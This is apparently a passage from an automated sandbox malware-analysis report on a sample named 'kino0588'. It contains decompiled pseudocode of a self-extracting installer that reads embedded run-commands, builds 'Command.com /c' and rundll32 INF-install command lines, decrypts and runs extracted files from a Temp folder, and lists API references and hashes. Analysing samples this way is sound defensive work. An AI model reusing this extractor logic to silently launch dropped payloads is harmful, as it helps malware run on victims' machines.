												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x199a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x19a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x199124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x199a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x198a20;
										if( *0x198a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0019202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0019468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x198c42;
									if( *0x198c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x198a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0019468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0019468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00191781( &_v276, 0x104, _t130, 0x198c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0019468F(_t130, 0x199a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}
                                                                                                                                                                                                                                    0x00193c4f
                                                                                                                                                                                                                                    0x00193c56
                                                                                                                                                                                                                                    0x00193c60
                                                                                                                                                                                                                                    0x00193c65
                                                                                                                                                                                                                                    0x00193c77
                                                                                                                                                                                                                                    0x00193c78
                                                                                                                                                                                                                                    0x00193c7c
                                                                                                                                                                                                                                    0x00193c7e
                                                                                                                                                                                                                                    0x00193c82
                                                                                                                                                                                                                                    0x00193c82
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c7c
                                                                                                                                                                                                                                    0x00193c67
                                                                                                                                                                                                                                    0x00193c69
                                                                                                                                                                                                                                    0x00193c6d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193c58
                                                                                                                                                                                                                                    0x00193c58
                                                                                                                                                                                                                                    0x00193c6e
                                                                                                                                                                                                                                    0x00193c6e
                                                                                                                                                                                                                                    0x00193c87
                                                                                                                                                                                                                                    0x00193c89
                                                                                                                                                                                                                                    0x00193d4d
                                                                                                                                                                                                                                    0x00193d4f
                                                                                                                                                                                                                                    0x00193d50
                                                                                                                                                                                                                                    0x00193d52
                                                                                                                                                                                                                                    0x00193d9e
                                                                                                                                                                                                                                    0x00193da8
                                                                                                                                                                                                                                    0x00193daf
                                                                                                                                                                                                                                    0x00193db4
                                                                                                                                                                                                                                    0x00193db6
                                                                                                                                                                                                                                    0x00193f4d
                                                                                                                                                                                                                                    0x00193f4d
                                                                                                                                                                                                                                    0x00193f4f
                                                                                                                                                                                                                                    0x00193f56
                                                                                                                                                                                                                                    0x00193f57
                                                                                                                                                                                                                                    0x00193f58
                                                                                                                                                                                                                                    0x00193f63
                                                                                                                                                                                                                                    0x00193f63
                                                                                                                                                                                                                                    0x00193dbc
                                                                                                                                                                                                                                    0x00193dc0
                                                                                                                                                                                                                                    0x00193dc2
                                                                                                                                                                                                                                    0x00193de6
                                                                                                                                                                                                                                    0x00193de6
                                                                                                                                                                                                                                    0x00193de8
                                                                                                                                                                                                                                    0x00193f0b
                                                                                                                                                                                                                                    0x00193f0b
                                                                                                                                                                                                                                    0x00193f0f
                                                                                                                                                                                                                                    0x00193f13
                                                                                                                                                                                                                                    0x00193f15
                                                                                                                                                                                                                                    0x00193f1a
                                                                                                                                                                                                                                    0x00193f1c
                                                                                                                                                                                                                                    0x00193f46
                                                                                                                                                                                                                                    0x00193f47
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f47
                                                                                                                                                                                                                                    0x00193f1e
                                                                                                                                                                                                                                    0x00193f1f
                                                                                                                                                                                                                                    0x00193f25
                                                                                                                                                                                                                                    0x00193f26
                                                                                                                                                                                                                                    0x00193f2a
                                                                                                                                                                                                                                    0x00193f2d
                                                                                                                                                                                                                                    0x00193fd9
                                                                                                                                                                                                                                    0x00193fd9
                                                                                                                                                                                                                                    0x00193fda
                                                                                                                                                                                                                                    0x00193fda
                                                                                                                                                                                                                                    0x00193fe1
                                                                                                                                                                                                                                    0x00193fe3
                                                                                                                                                                                                                                    0x00193fe3
                                                                                                                                                                                                                                    0x00193fe8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193fe8
                                                                                                                                                                                                                                    0x00193f33
                                                                                                                                                                                                                                    0x00193f37
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f37
                                                                                                                                                                                                                                    0x00193dee
                                                                                                                                                                                                                                    0x00193dee
                                                                                                                                                                                                                                    0x00193df5
                                                                                                                                                                                                                                    0x00193fad
                                                                                                                                                                                                                                    0x00193fb9
                                                                                                                                                                                                                                    0x00193fc2
                                                                                                                                                                                                                                    0x00193fc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193fc8
                                                                                                                                                                                                                                    0x00193dfb
                                                                                                                                                                                                                                    0x00193dfd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193e03
                                                                                                                                                                                                                                    0x00193e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193e15
                                                                                                                                                                                                                                    0x00193e17
                                                                                                                                                                                                                                    0x00193e19
                                                                                                                                                                                                                                    0x00193f94
                                                                                                                                                                                                                                    0x00193fa4
                                                                                                                                                                                                                                    0x00193f7c
                                                                                                                                                                                                                                    0x00193f80
                                                                                                                                                                                                                                    0x00193f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f8b
                                                                                                                                                                                                                                    0x00193e2c
                                                                                                                                                                                                                                    0x00193e30
                                                                                                                                                                                                                                    0x00193e34
                                                                                                                                                                                                                                    0x00193e36
                                                                                                                                                                                                                                    0x00193f69
                                                                                                                                                                                                                                    0x00193f6e
                                                                                                                                                                                                                                    0x00193f70
                                                                                                                                                                                                                                    0x00193f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193f76
                                                                                                                                                                                                                                    0x00193e3c
                                                                                                                                                                                                                                    0x00193e43
                                                                                                                                                                                                                                    0x00193e47

APIs
• memset.MSVCRT ref: 00193C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00193CDC
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00198C42), ref: 00193D8F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00193E26
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00198C42), ref: 00193EFF
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00198C42), ref: 00193F1F
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00198C42), ref: 00193F40
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00198C42), ref: 00193F47
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00198C42), ref: 00193F76
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00198C42), ref: 00193F80
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00198C42), ref: 00193FC2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
                                                                                                                                                                                                                                    • API String ID: 1032054927-885953201
                                                                                                                                                                                                                                    • Opcode ID: b4923ede8354e96c4f9e9ac89bcfe5b50f4e0615165c987f37daf53fad84d034
                                                                                                                                                                                                                                    • Instruction ID: a75d452dc1f342c34a14a0f407fbaa9af8468c0283ba286012258b020452cbe2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4923ede8354e96c4f9e9ac89bcfe5b50f4e0615165c987f37daf53fad84d034
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7B1F2709083019BDF24DF688849B6B77E4EF85710F10092EFAA5D7590DB70CA85CB96
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00191AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                                                    				CHAR* _t92;
                                                                                                                                                                                                                                    				char _t105;
                                                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                                                    				CHAR** _t111;
                                                                                                                                                                                                                                    				CHAR* _t115;
                                                                                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                                                    				CHAR* _t132;
                                                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t48 =  *0x198004; // 0x21bd9a3c
                                                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                                                    				E00191680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                                                    				_t54 = E00191A84(_t111, _t135);
                                                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                                                    				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00191781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					E0019658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00191680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E001966C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E001966C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00191680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00191781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E001916B3( &_v1552, 0x400, " ");
										E001916B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00192AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0019171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00191A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00191A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E001944B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x199120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x191140, _t156, 8,  &_v268) == 0) {
										 *0x199a34 =  *0x199a34 & 0xfffffffb;
										if( *0x199a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0019171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x199a34 =  *0x199a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00191680(_t108, 0x104, _t155);
										_t140 = 0x200;
                                                                                                                                                                                                                                    										E00191680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                                                    									return E00196CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}














































                                                                                                                                                                                                                                    0x00191dd4
                                                                                                                                                                                                                                    0x00191dd6
                                                                                                                                                                                                                                    0x00191ddb
                                                                                                                                                                                                                                    0x00191ddc
                                                                                                                                                                                                                                    0x00191dde
                                                                                                                                                                                                                                    0x00191d64
                                                                                                                                                                                                                                    0x00191d64
                                                                                                                                                                                                                                    0x00191d67
                                                                                                                                                                                                                                    0x00191d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191c67
                                                                                                                                                                                                                                    0x00191c67
                                                                                                                                                                                                                                    0x00191c6d
                                                                                                                                                                                                                                    0x00191c72
                                                                                                                                                                                                                                    0x00191c74
                                                                                                                                                                                                                                    0x00191c74
                                                                                                                                                                                                                                    0x00191c8e
                                                                                                                                                                                                                                    0x00191c99
                                                                                                                                                                                                                                    0x00191cc0
                                                                                                                                                                                                                                    0x00191cf8
                                                                                                                                                                                                                                    0x00191d07
                                                                                                                                                                                                                                    0x00191d23
                                                                                                                                                                                                                                    0x00191d09
                                                                                                                                                                                                                                    0x00191d14
                                                                                                                                                                                                                                    0x00191d1b
                                                                                                                                                                                                                                    0x00191d1b
                                                                                                                                                                                                                                    0x00191d2b
                                                                                                                                                                                                                                    0x00191d2d
                                                                                                                                                                                                                                    0x00191d2d
                                                                                                                                                                                                                                    0x00191d38
                                                                                                                                                                                                                                    0x00191d39
                                                                                                                                                                                                                                    0x00191d46
                                                                                                                                                                                                                                    0x00191cc2
                                                                                                                                                                                                                                    0x00191cc2
                                                                                                                                                                                                                                    0x00191ccc
                                                                                                                                                                                                                                    0x00191cce
                                                                                                                                                                                                                                    0x00191cce
                                                                                                                                                                                                                                    0x00191cdb
                                                                                                                                                                                                                                    0x00191ce6
                                                                                                                                                                                                                                    0x00191cee
                                                                                                                                                                                                                                    0x00191cee
                                                                                                                                                                                                                                    0x00191e89
                                                                                                                                                                                                                                    0x00191e91
                                                                                                                                                                                                                                    0x00191e92
                                                                                                                                                                                                                                    0x00191e94
                                                                                                                                                                                                                                    0x00191e97
                                                                                                                                                                                                                                    0x00191ea4
                                                                                                                                                                                                                                    0x00191ea4
                                                                                                                                                                                                                                    0x00191c61
                                                                                                                                                                                                                                    0x00191c07
                                                                                                                                                                                                                                    0x00191bd3
                                                                                                                                                                                                                                    0x00191b7b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00191BE7
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00191BFE
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00191C57
                                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00191C88
                                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00191140,00000000,00000008,?), ref: 00191CB8
                                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00191D1B
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                    • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                    • API String ID: 383838535-3401884814
                                                                                                                                                                                                                                    • Opcode ID: ed41a49e5273b3549aca49d49ea76f479455e54be0da82bcb297fabeceffa8d4
                                                                                                                                                                                                                                    • Instruction ID: 769f1ca09f0ae4e16e83d00de15b3a9b18f91587f748e76838fb952ab74423c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed41a49e5273b3549aca49d49ea76f479455e54be0da82bcb297fabeceffa8d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3A15CB0A0021A7BEF219B24CC45FFA77AAEF55310F1402A5F955A32D1DBB09EC5CB51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00192F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v272;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t9;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				struct HWND__* _t12;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    				void* _t30;
	_Unknown_base(*)()* _t31;
	void* _t34;
	struct HINSTANCE__* _t36;
	intOrPtr _t41;
	intOrPtr* _t44;
	signed int _t46;
	int _t47;
	void* _t58;
	void* _t59;

	_t43 = __edx;
	_t9 =  *0x198004; // 0x21bd9a3c
	_v8 = _t9 ^ _t46;
	if( *0x198a38 != 0) {
		L5:
		_t11 = E00195164(_t52);
		_t53 = _t11;
		if(_t11 == 0) {
			L16:
			_t12 = 0;
			L17:
			return E00196CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
		}
		_t14 = E001955A0(_t53); // executed
		if(_t14 == 0) {
			goto L16;
		} else {
			_t45 = 0x105;
			GetSystemDirectoryA( &_v272, 0x105);
			_t43 = 0x105;
			_t40 =  &_v272;
			E0019658A( &_v272, 0x105, "advapi32.dll");
			_t36 = LoadLibraryA( &_v272);
			_t44 = 0;
			if(_t36 != 0) {
				_t31 = GetProcAddress(_t36, "DecryptFileA");
				_v276 = _t31;
				if(_t31 != 0) {
					_t45 = _t47;
					_t40 = _t31;
					 *0x19a288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
					_v276();
					if(_t47 != _t47) {
						_t40 = 4;
						asm("int 0x29");
					}
				}
			}
			FreeLibrary(_t36);
			_t58 =  *0x198a24 - _t44; // 0x0
			if(_t58 != 0) {
				L14:
				_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
				if(_t21 != 0) {
					__eflags =  *0x198a2c - _t44; // 0x0
					if(__eflags != 0) {
						L20:
						__eflags =  *0x198d48 & 0x000000c0;
						if(( *0x198d48 & 0x000000c0) == 0) {
							_t41 =  *0x199a40; // 0x3, executed
							_t26 = E0019256D(_t41); // executed
							_t44 = _t26;
						}
						_t22 =  *0x198a24; // 0x0
						 *0x199a44 = _t44;
						__eflags = _t22;
						if(_t22 != 0) {
							L26:
							__eflags =  *0x198a38;
							if( *0x198a38 == 0) {
								__eflags = _t22;
								if(__eflags == 0) {
									E00194169(__eflags);
								}
							}
							_t12 = 1;
							goto L17;
						} else {
							__eflags =  *0x199a30 - _t22; // 0x0
							if(__eflags != 0) {
								goto L26;
							}
							_t25 = E00193BA2(); // executed
							__eflags = _t25;
							if(_t25 == 0) {
								goto L16;
							}
							_t22 =  *0x198a24; // 0x0
							goto L26;
						}
					}
					_t27 = E00193B26(_t40, _t44);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L16;
					}
					goto L20;
				}
				_t43 = 0x4bc;
				E001944B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
				 *0x199124 = E00196285();
				goto L16;
			}
			_t59 =  *0x199a30 - _t44; // 0x0
			if(_t59 != 0) {
				goto L14;
			}
			_t30 = E0019621E(); // executed
			if(_t30 == 0) {
				goto L16;
			}
			goto L14;
		}
	}
	_t49 =  *0x198a24;
	if( *0x198a24 != 0) {
		L4:
		_t34 = E00193A3F(_t51);
		_t52 = _t34;
		if(_t34 == 0) {
			goto L16;
		}
		goto L5;
	}
	if(E001951E5(_t49) == 0) {
		goto L16;
	}
	_t51 =  *0x198a38;
	if( *0x198a38 != 0) {
		goto L5;
	}
	goto L4;
}

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00192F93
